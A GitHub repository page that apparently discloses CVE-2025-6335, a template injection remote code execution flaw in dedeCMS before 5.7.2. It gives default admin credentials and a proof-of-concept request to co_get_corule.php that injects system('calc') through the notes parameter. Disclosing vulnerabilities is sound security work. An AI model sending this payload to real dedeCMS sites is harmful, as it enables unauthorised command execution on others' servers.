Skip to content

jujubooom/CVE-2025-6335

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
README.md
README.md
 
 

Repository files navigation

Title: Template injection command execution vulnerability in dedeCMS 5.7 sp2

BUG_Author: Ewoji

Affected Version: dedeCMS < 5.7.2

Vendor: Shanghai Zhuozhuo Network Technology Co., LTD

Software: dedeCMS

Vulnerability Files:

  • /include/dedetag.class.php

Description:

  1. After install,Log in to the background

    • Use the default account password admin/admin

  2. Exploiting the Template

    • Access the dede/co_get_corule.php interface
    • Pass in the parameter /dede/co_get_corule.php? notes={dede:"); system('calc'); ///}&job=1,Accessing twice like this can execute the command

  3. Verifying the Exploit:

    • If the injection is successful,The attacker will execute arbitrary commands

Proof of Concept:

/dede/co_get_corule.php?notes={dede:");system('calc');///}&job=1
Accessing twice like this can execute the command

detail:CVE-2025-6335-dedeCMS后台模板注入RCE

About

cve报告

Resources

Readme
Activity

Stars

6 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

 
 
 

Contributors